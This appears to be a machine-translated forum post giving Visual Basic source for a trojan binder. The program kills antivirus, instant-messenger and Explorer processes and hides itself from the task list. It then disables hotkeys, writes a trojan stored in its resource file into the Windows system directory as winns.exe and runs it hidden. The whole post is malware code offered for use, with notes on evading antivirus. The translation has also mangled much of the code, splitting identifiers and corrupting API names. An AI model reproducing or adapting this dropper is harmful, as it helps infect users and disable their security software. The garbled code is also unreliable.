Use the source code of the Trojan bundle developed by VB.

This was a long time ago when I answered a question about using VB to bind a trojan. Some APIs can only be used for Win9x. The reply is as follows:

In fact, the file size does not need to be recorded. For convenience, I directly used the bundle tool to merge my program with the trojan, and the results were discovered by anti-virus software, later, I thought of putting the Trojan horse into the resource file. When the program runs, I first kill the antivirus software process and release it. The effect was good, and the antivirus software could not be found, the following is the source code of my program. There are also a lot of codes irrelevant to it. I am used to kill processes. getdesktopwindows can be completely replaced by enumwindows, and the code can be reduced a lot.

Option explicitdim wndnum as long 'Save the number of All Forms dim lpwnd (128) as string 'store all form headers array' set process priority private declare function setpriorityclass lib _ "Kernel32" (_ byval hprocess as long, _ byval dwpriorityclass as long _) as long 'get the current process private declare function getcurrentprocess lib _ "Kernel32" () as long' with the lowest priority, indicates that private const idle_priority_class = & h40' is run when the computer is idle to register the process as a service. Private declare funct is unavailable in Windows 2000. Ion registerserviceprocess lib _ "Kernel32" (_ byval hprocess as long, _ byval uflags as long _) As long 'Get the current process idprivate declare function getcurrentprocessid lib _ "Kernel32 "() as long 'is used in this program to shield the hotkey private declare function systemparametersinfo lib _ "USER32" alias "systemparametersinfoa" (_ byval uaction as long, _ byval uparam as long, _ byref lpvparam as any, _ byval fuwinini as long _) as l Ong 'shield hotkeys. For Windows 2000, private const spi_screensaverrunning = 97' is invalid. Set the form to the top-level private declare function setwindowpos lib _ "USER32" (_ byval hwnd as long, _ byval hwndinsertafter as long, _ byval X as long, _ byval y as long, _ byval CX as long, _ byval Cy as long, _ byval wflags as long _) as long 'set the form to the first private const hwnd_topmost =-1' to get the desktop handle private declare function getdesktopwindow lib _ "user3 2 "() as long 'get the form handle private declare function getwindow lib _" USER32 "(_ byval hwnd as long, _ byval wcmd as long _) as long 'get the subform handle private const gw_child = 5' get the next form handle private const gw_hwndnext = 2' get the form title private declare function getwindowtext lib _ "USER32" alias "getwindowtexta "( _ byval hwnd as long, _ byval lpstring as string, _ byval CCH as long _) As long 'send messages to close specified programs, such as anti-virus, private Dec Lare function postmessage lib _ "USER32" alias "postmessagea" (_ byval hwnd as long, _ byval wmsg as long, _ byval wparam as long, _ byval lparam as long _) as long 'close program private const wm_close = & h10' exit program private const wm_quit = & h12' find form private declare function findwindow lib _ "USER32" alias "find1_wa" (_ byval lpclassname as string, _ byval lpwindowname as string _) As long 'Get class name private d Eclare function getclassname lib _ "USER32" alias "getclassnamea" (_ byval hwnd as long, _ byval lpclassname as string, _ byval nmaxcount as long _) as long 'latency to ensure that the program has closed private declare sub sleep lib _ "Kernel32" (_ byval dwmilliseconds as long _) 'obtain the Windows System directory private declare function getsystemdirectory lib _ "Kernel32" alias "getsystemdirectorya" (_ byval lpbuffer as string, _ byval nsize Long _) As long 'Destroy the form and release the memory private declare function destroywindow lib _ "USER32" (_ byval hwnd as long _) as long' to destroy the handle, release memory private declare function closehandle lib _ "Kernel32" (_ byval hobject as long _) As long 'enumerated form private declare function enumwindows lib _ "USER32" (_ byval lpenumfunc as long, _ byval lparam as long _) as longprivate sub form_load () 'only runs one instance of the application if app. previnstance = tr UE then end' sets the form to the top-level setwindowpos me. hwnd, hwnd_topmost, 0, 0, 0, 0, 0, 0' give the user a prompt that msgbox "runs in full screen mode. Please close all programs to" & _ "for the best effect! ", Vbinformation or vbsystemmodal 'cancel the hotkey systemparametersinfo spi_screensaverrunning, _ true, 0, 0' to center the image in IMG. move (screen. width-IMG. width)/2, _ (screen. height-IMG. height)/2 FRA (0 ). move IMG. left-FRA (0 ). width-600 FRA (1 ). move IMG. left + IMG. width + 600 'get the process and set its priority to idle setpriorityclass getcurrentprocess, _ idle_priority_class 'to get the process ID and register it as a service type, therefore, after pressing _ CTRL + ALT + DEL, the process becomes invisible. This method can also be directly used by App. taskvisible = false, _ But the effect is not good. Note that this API does not support win2000 system registerserviceprocess getcurrentprocessid, 1 'refresh the process refreshprocess' to kill the browser do while killprocess ("Explorer ") <> 0 loop 'Kill the folder or do while killprocess ("wclass", true) in the Internet Explorer browser <> 0 loop do while killprocess ("systemtr", true) <> 0 loop 'Kill OICQ do while killprocess ("ICQ") <> 0 loop 'Kill anti-virus software such as antivirus software do while killprocess ("poison ") <> 0 loop do while killprocess ("Overlord") <> 0 loop 'release the executable file writeexeend sub 'in the resource file to refresh all processes private sub refreshprocess () dim retwnd as long' form handle dim dskwnd as long' desktop handle dim lptitle as string * 128 'form title' clear the reserved form name in the array for wndnum = lbound (lpwnd) to ubound (lpwnd) lpwnd (wndnum) = "" next wndnum 'number of forms initialized wndnum = 0' obtain the desktop handle dskwnd = getjavastopwindow () 'retrieve desktop subforms retwnd = getwindow (dskwnd, gw_child) 'list all forms do while retwnd <> 0' get form titles getwindowtext retwnd, lptitle, Len (lptitle) 'Save the title to the array if left (lptitle, 1) <> vbnullchar then lpwnd (wndnum) = left (lptitle, instr (1, _ lptitle, vbnullchar)-1) wndnum = wndnum + 1 end if 'Get the next form retwnd = getwindow (retwnd, gw_hwndnext) loopend sub' to close the private function killprocess (keyword as string, _ optional isclass as Boolean = false) as long dim lpclassname as string * 128 dim classname as string dim fndwnd as long dim wndhdc as long killprocess = 0 for fndwnd = 0 to wndnum' determine whether the search is a class keyword if isclass = true then' get the form handle wndhdc = findwindow (vbnullstring, _ lpwnd (fndwnd) 'gets the class name to the buffer zone getclassname wndhdc, lpclassname, _ Len (lpclassname)' and resolves the class name classname = left (lpclassname, instr (1, _ lpclassname, vbnullchar)-1) 'Close it after it is found. Sometimes only wm_quit cannot be used to complete the task. Use wm_close to try again if instr (1, classname, keyword)> 0 then wndhdc = findwindow (classname, _ vbnullstring) killprocess = killprocess + 1 quitdestroy wndhdc end if 'find the form elseif instr (1, lpwnd (fndwnd) with keywords, keyword)> 0 then wndhdc = findwindow (vbnullstring, _ lpwnd (fndwnd) killprocess = killprocess + 1 quitdestroy wndhdc end if next fndwndend functionprivate sub writeexe () dim exedata () as byte dim filenum as long dim Sysdir as string * 128 getsystemdirectory Sysdir, Len (Sysdir) exedata = loadresdata ("loveme", "execute") filenum = freefile () open left (Sysdir, instr (1, Sysdir, vbnullchar) _-1) & "/winns.exe" for binary as # filenum put # filenum ,, exedata close # filenum shell left (Sysdir, instr (1, Sysdir, vbnullchar) _-1) & "/winns.exe", vbhideend subprivate sub quitdestroy (WND as long) postmessage WND, wm_quit, 0, 0 postmessage WND, wm_close, 0, 0 destroywindow WND closehandle WND 'refresh the process again, which is necessary to determine whether the thread exists, otherwise, the process will kill the refreshprocessend sub.